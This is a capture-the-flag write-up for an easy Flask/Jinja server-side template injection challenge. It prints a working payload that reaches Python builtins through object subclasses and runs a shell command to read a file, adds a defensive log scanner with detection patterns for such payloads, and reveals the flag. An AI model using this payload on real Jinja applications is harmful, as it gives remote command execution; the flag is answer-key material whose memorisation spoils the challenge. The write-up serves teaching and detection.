BlahajCTF 2024 | Baby SSTI

Published on: February 6, 2025

2 min read · Posted by Baba is Dead

Challenge Details

Description

Category: Web Exploitation
Difficulty: Easy
Topics: SSTI, Python
Competition: BlahajCTF 2024
Author: Baba is Dead

Can you hack this website and get the flag?

Writeup

About the Challenge

This is a guided SSTI challenge. The application is built on Flask with Jinja templates and contains an obvious server-side template injection.

Solve Process

We can follow the challenge's instructions by first leaking the hackerman variable.

{{hackerman}}

The page then tells us that the flag is located at /app/flag.txt.

There are many ways to read the flag. I will use the same payload as in my View Source writeup:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("cat flag.txt").read()}}{%endif%}{% endfor %}

In essence, the above iterates over the subclasses of object until it finds one whose name contains "warning", reaches Python's builtins through that class's _module attribute, imports os, and runs popen to read the flag file. The SSTI Golf challenge later uses a similar approach.
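As an added example (not part of this writeup or the challenge), the following Python scans constructed access-log lines for the two signals present in the payloads above: Jinja delimiters ({{ }} and {% %}), which on their own may be no more than a probe such as {{hackerman}}, and the object-introspection tokens (__class__, __subclasses__, __builtins__, _module, popen) that turn a probe into code execution. The log format, client addresses and timestamps are assumptions. On the application side the durable fix is to never build the template source from user input (pass the value to the template as a context variable instead); the detection below is for spotting attempts against code that still does.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Template delimiters on their own are a weak signal: legitimate input can
# contain braces, and the {{hackerman}} probe only reads a variable.
TEMPLATE_SYNTAX = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)

# Object-introspection tokens are what turn a probe into code execution
# (the payload above walks __subclasses__ to reach __builtins__ and popen).
INTROSPECTION = re.compile(
    r"__(?:class|base|mro|subclasses|builtins|import|globals)__|\b_module\b|\bpopen\b"
)

# Access-log shape assumed here: Apache/nginx "combined"-style request lines.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|PUT|PATCH) (\S+) HTTP/')


def classify_request(target: str) -> dict:
    """Decode each query parameter of a request target and report SSTI indicators."""
    findings = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        has_syntax = bool(TEMPLATE_SYNTAX.search(value))
        tokens = sorted({m.group(0) for m in INTROSPECTION.finditer(value)})
        if has_syntax or tokens:
            findings.append({"param": key, "template_syntax": has_syntax, "introspection": tokens})
    if any(f["introspection"] for f in findings):
        severity = "high"      # template syntax plus object walking: treat as exploitation
    elif findings:
        severity = "medium"    # template syntax only: a probe such as {{hackerman}}
    else:
        severity = "none"
    return {"severity": severity, "findings": findings}


def scan_log(lines) -> list:
    """Run classify_request over log lines; returns one record per parsable line."""
    results = []
    for number, line in enumerate(lines, start=1):
        match = LOG_LINE.match(line)
        if not match:
            continue  # not a request line we understand; skip rather than guess
        client, target = match.groups()
        record = classify_request(target)
        record.update({"line": number, "client": client})
        results.append(record)
    return results


# Constructed sample lines (not real traffic). Line 3 carries the writeup's
# payload, URL-encoded the way a browser or curl would send it in a query string.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Dec/2024:10:00:01 +0000] "GET /?name=Alice HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Dec/2024:10:00:05 +0000] "GET /?name=%7B%7Bhackerman%7D%7D HTTP/1.1" 200 540',
    '203.0.113.7 - - [01/Dec/2024:10:00:09 +0000] "GET /?name=%7B%25+for+x+in+().__class__.__base__.__subclasses__()+%25%7D'
    '%7B%25+if+%22warning%22+in+x.__name__+%25%7D%7B%7Bx()._module.__builtins__%5B%27__import__%27%5D(%27os%27)'
    '.popen(%22cat+flag.txt%22).read()%7D%7D%7B%25endif%25%7D%7B%25+endfor+%25%7D HTTP/1.1" 200 590',
    '198.51.100.2 - - [01/Dec/2024:10:00:12 +0000] "GET /?name=%7B%22a%22%3A1%7D HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for record in scan_log(SAMPLE_LOG):
        print(record["line"], record["client"], record["severity"], record["findings"])
```

Running the block prints one record per line: the plain name and the single-brace JSON value score "none", the {{hackerman}} probe scores "medium", and the subclasses payload scores "high" with the introspection tokens it used listed, which is the line worth alerting on.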

Flag

blahaj{SsT1_ExpL01T}

Resources

Server Side Template Injection (HackTricks)
View Source
SSTI Golf
